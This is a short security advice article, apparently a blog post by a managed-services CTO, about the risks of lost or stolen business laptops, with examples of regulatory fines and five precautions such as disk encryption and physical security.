“Were missing a laptop!" These words are not something an IT admin wants to hear, but the chances are it’s going to happen at some point. Unfortunately, data on the majority of SMB laptops is not encrypted, so what exactly does it mean to your company if this does happen?
It means that if the bad guys pull the hard drive from the missing device and plug it into a running system, fire a few commands at the attached drive to “take ownership” of all the files, or use a disk editor on the slaved disk, then the chances are they can get “most” of the data off it. A simple user ID and password are not going to be adequate protection.
Are the thieves going to bother even looking at the stolen laptop or other device? Many years ago the hardware itself would fetch a decent amount on auction sites as “previously owned”. With the professionalization of cyber crime, often times the data from a professional firm is worth more than the hardware itself.
Cyber criminals are very aware of the value of purloined data and a lost laptop can quickly turn into a serious incident. For example, the theft of personal may lead to an extortion demand or blackmail attempt. Furthermore, increasingly, a fine from a regulatory or governing body is frequently being applied to organizations that take a cavalier attitude towards laptop security.
In 2013, The Information Commissioner's Office (ICO) in the UK fined Glasgow City Council £150,000 for the loss of two unencrypted laptops, one of which contained personal details on more than 20,000 people.
In 2014, two entities paid the U.S. Department of Health and Human Services Office for Civil Rights (OCR) $1,975,220 collectively to resolve potential violations of the Health Insurance Portability and Accountability Act (HIPAA) Privacy and Security Rules.
Stolen or lost laptops have become one of the most common business security incidents, according to the 2014 Data Breach Investigation Report by Verizon and depending on the regulations governing your business, the penalties and costs could be significant. These penalties and costs continue to grow as the individuals’ privacy, which was violated, may seek additional restitution.
These major enforcement actions in the US and UK underscore the significant risk to the security of personal or medical information posed by laptop computers and other mobile devices.
Here are five precautions you can take, to ensure you limit the damage of a stolen device:
1/ Utilize tools such as full disk encryption
With the introduction of Windows 8.1 “Bitlocker”, Microsoft’s disk encryption solution is bundled in the operating system (Windows 7 Ultimate had it as well). It takes some work to roll it out to an organization, but since it is included your organization could find itself in a difficult legal position if a data breach occurs. There are also a plethora of third-party add-on solutions.
2/ Physical Security
The traveling or unattended laptop is one of the more risky situations any mobile device can find itself in. In public places or even hotel rooms, the corporate laptop, or tablet should be at best secured in a safe and at worst stored out of site. In the office, a security tether should be used, especially if overall access control to the facility is weak or the organization is large.
3/ Data Segmentation
If storing all your data on a USB stick seems like a solution; think again. Your laptop may have an email client installed on it; and if those sensitive documents or information has been attached the bad guys may get at those files. If you only utilize web mail and your documents are on an encrypted USB stick this may be a useful technique to survive a lost or stolen device.
It may sound like something out of Mission Impossible but the physical destruction of a device that falls into the wrong hands is best, but drive wipe with secure erase software should be your minimum. Always keep in mind that the data lives on the hard drive inside the device. If you plan on backing up user files or archiving the contents of the old device, first make sure that is secure as well.
5/ Avoid Logos
Advertising who you work for may not be the best idea if you are in a high-risk situation like the worlds largest hacker convention. Not the best time to bust out your NSA stickered Panasonic Toughbook.
Ultimately, you need to remember that security of your mobile device(s) is your responsibility. IT can have magical solutions and folks stolen property is returned by strangers, or found using technology all the time. Unfortunately, if it’s out of your control the contents may be copied or malware may have been implanted – be careful.
Ian Thornton-Trump, CSA+, CD, CEH, CNDA, CPM, BA is CTO at Octopi Managed Services Inc. Ian is an ITIL certified Information Technology (IT) consultant with more than 20 years of experience in IT security and information technology. He enjoys and maintains a strong commitment to the security community. From 1989 to 1992, Ian served with the Canadian Forces (CF), Military Intelligence Branch; in 2002, he joined the CF Military Police Reserves and retired as a Public Affairs Officer in 2013.
You can follow Ian on Twitter® at @phat_hobbit.